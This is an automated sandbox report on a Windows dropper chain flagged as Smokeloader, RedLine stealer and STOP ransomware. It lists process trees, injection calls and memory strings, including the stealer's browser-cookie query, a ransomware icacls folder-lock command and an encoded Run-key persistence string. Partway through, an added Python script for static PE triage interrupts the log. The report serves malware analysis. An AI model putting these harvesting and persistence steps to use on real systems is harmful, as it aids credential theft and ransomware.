Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPED Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: String function: 00413FF0 appears 54 times
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401558
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401749
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401564
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401523
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401585
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040158C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040159A
Source: 3046.exe.4.dr Static PE information: Section: .data ZLIB complexity 0.9922957294330775
Source: 3046.exe.15.dr Static PE information: Section: .data ZLIB complexity 0.9922957294330775
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
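The static PE findings in this report (a section count above 10, VMProtect's .vmp0/.vmp1 section names, a .data section whose ZLIB complexity is close to 1.0, and the .text characteristics flags) are cheap triage heuristics that can be reproduced without the sandbox. The Python below is an added example, not code from the report or from Joe Sandbox: it walks the section table using only the standard library, computes compressed-size / raw-size as a stand-in for the report's "ZLIB complexity" (an assumption about how that figure is defined, not something the report states), and runs the checks against a constructed, non-loadable PE32 skeleton shaped like the flagged samples. The threshold of 0.9, the `.vmp` prefix check and the writable-and-executable section check are the example author's choices.

```python
from __future__ import annotations

import random
import struct
import zlib
from dataclasses import dataclass

# Section/file characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100


@dataclass
class Section:
    name: str
    characteristics: int
    data: bytes

    def zlib_complexity(self) -> float:
        """Compressed size / raw size. Assumed (not confirmed by the report) to be how the
        'ZLIB complexity' figure is derived: ~1.0 = incompressible (encrypted or packed),
        ~0.0 = highly repetitive."""
        if not self.data:
            return 0.0
        return len(zlib.compress(self.data, 9)) / len(self.data)


def parse_sections(pe: bytes) -> list[Section]:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> section table -> raw bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", pe, coff + 2)   # IMAGE_FILE_HEADER.NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)    # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    off = coff + 20 + opt_size                               # first 40-byte IMAGE_SECTION_HEADER
    sections = []
    for _ in range(n_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        (chars,) = struct.unpack_from("<I", pe, off + 36)   # IMAGE_SECTION_HEADER.Characteristics
        data = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), chars, data))
        off += 40
    return sections


def triage(pe: bytes, max_sections: int = 10, packed_threshold: float = 0.9) -> list[str]:
    """Emit findings in the wording the report uses for its static PE checks."""
    secs = parse_sections(pe)
    findings = []
    if len(secs) > max_sections:
        findings.append(f"Number of sections : {len(secs)} > {max_sections}")
    vmp = [s.name for s in secs if s.name.startswith(".vmp")]
    if vmp:
        findings.append(f"{' and '.join(vmp)} section names (VMProtect)")
    for s in secs:
        ratio = s.zlib_complexity()
        if len(s.data) >= 64 and ratio > packed_threshold:
            findings.append(f"Section: {s.name} ZLIB complexity {ratio:.4f}")
        if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"Section: {s.name} is writable and executable")
    return findings


def build_sample_pe(section_specs: list[tuple[bytes, int, bytes]]) -> bytes:
    """Constructed, non-loadable PE32 skeleton (headers + section table + raw data) so the
    parser can be exercised offline. Not derived from any sample in the report."""
    e_lfanew, opt_size, n = 0x40, 0xE0, len(section_specs)
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, n, 0, 0, 0, opt_size,
                       IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * n          # raw data follows the section table
    headers, payload, vaddr = bytearray(), bytearray(), 0x1000
    for name, chars, data in section_specs:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), vaddr,
                               len(data), raw_ptr + len(payload), 0, 0, 0, 0, chars)
        payload += data
        vaddr += 0x1000 * (len(data) // 0x1000 + 1)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(headers) + bytes(payload)


RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
R = IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RWX = RW | IMAGE_SCN_MEM_EXECUTE
_rng = random.Random(1337)                                   # deterministic stand-in for encrypted bytes

# Constructed "packed" image: 11 sections, VMProtect names, one incompressible data section.
PACKED_PE = build_sample_pe(
    [(b".text", RX, b"\x90" * 1024), (b".rdata", R, b"kernel32.dll\0" * 40),
     (b".data", RW, bytes(_rng.getrandbits(8) for _ in range(4096))),
     (b".vmp0", RX, b"\xcc" * 256), (b".vmp1", RWX, b"\x00" * 256)]
    + [(b".s%d" % i, R, b"\0" * 64) for i in range(6, 12)])
# Constructed benign-looking image: three ordinary, compressible sections.
CLEAN_PE = build_sample_pe(
    [(b".text", RX, b"\x90" * 512), (b".rdata", R, b"hello\0" * 50), (b".data", RW, b"\0" * 256)])

if __name__ == "__main__":
    for label, image in (("packed", PACKED_PE), ("clean", CLEAN_PE)):
        print(label, triage(image) or ["no static findings"])
```

A ratio near 1.0 on a writable data section is what an encrypted or packed payload looks like before it unpacks itself in memory, which fits the unpacking behaviour recorded for 3046.exe. On its own it is only a triage signal: compressed resources, embedded certificates and legitimate protectors score just as high, so combine it with the section-count and section-name checks rather than alerting on it alone.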
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@40/35@15/12
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: file.exe ReversingLabs: Detection: 48%
Source: file.exe Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\sievwvt C:\Users\user\AppData\Roaming\sievwvt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exe
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exe
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
Source: unknown Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe "C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" -h
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\pliu.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4113.tmp
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;dLjomud+YRBl+d09/o
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444688857.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444922096.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.441639812.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.450201207.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.466985483.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
Source: llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;)
Source: 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;+[
Source: llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;86VK9
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: D8D3.exe, 00000013.00000003.513494216.0000000003EA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0092C040 CreateToolhelp32Snapshot,Module32First, 0_2_0092C040
Source: A33B.exe.4.dr, Stub/Program.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Mutant created: \Sessions\1\BaseNamedObjects\MilcoSoft_#Rip_X
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess996
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\3046.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\98D7.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\pliu.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\4113.exe Unpacked PE file: 11.2.4113.exe.400000.0.unpack
